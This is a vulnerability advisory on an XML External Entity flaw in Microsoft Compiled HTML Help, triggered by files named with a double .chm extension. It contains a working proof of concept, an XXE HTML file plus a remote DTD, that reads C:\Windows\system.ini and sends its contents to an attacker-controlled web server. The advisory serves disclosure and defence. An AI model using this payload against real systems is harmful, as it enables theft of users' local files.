Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft
Compiled HTML Help is a Microsoft proprietary online help format,
consisting of a collection of HTML pages, an index and other navigation
tools.
The files are compressed and deployed in a binary format with
the extension .CHM, for Compiled HTML. The format is often used for
software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.

[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
CHM
Files are usually created using Microsofts "HTML Help Workshop"
program. However, I find a way to bypass using this program and create
them easily by
simply adding double .chm extension to the file
".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it
processing any JS/HTML/XML inside etc.
Compiled HTML Help is also
vulnerable to XML External Entity attacks allowing remote attackers to
steal and exfiltrate local system files.

Whats interesting about
this one is we can create the file without using the "Microsoft HTML
Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.

While
CHM is already considered a "dangerous" file type and other type of
attacks have already been documented. I thought this was an interesting
way to
create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.

[Exploit/POC]
1) python -m SimpleHTTPServer

2) "XXE.chm.chm"

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>

3) "payload.dtd"  (hosted in python web-server dir port 8000 above)

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
%all;

Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.

Tested successfully Windows 7/10

[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure

[+] Disclaimer
The
information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission
is hereby granted for the redistribution of this advisory, provided that
it is not altered except by reformatting it, and
that due credit is
given. Permission is explicitly given for insertion in vulnerability
databases and similar, provided that due credit
is given to the
author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility
for any damage caused
by the use or misuse of this information. The author prohibits any
malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx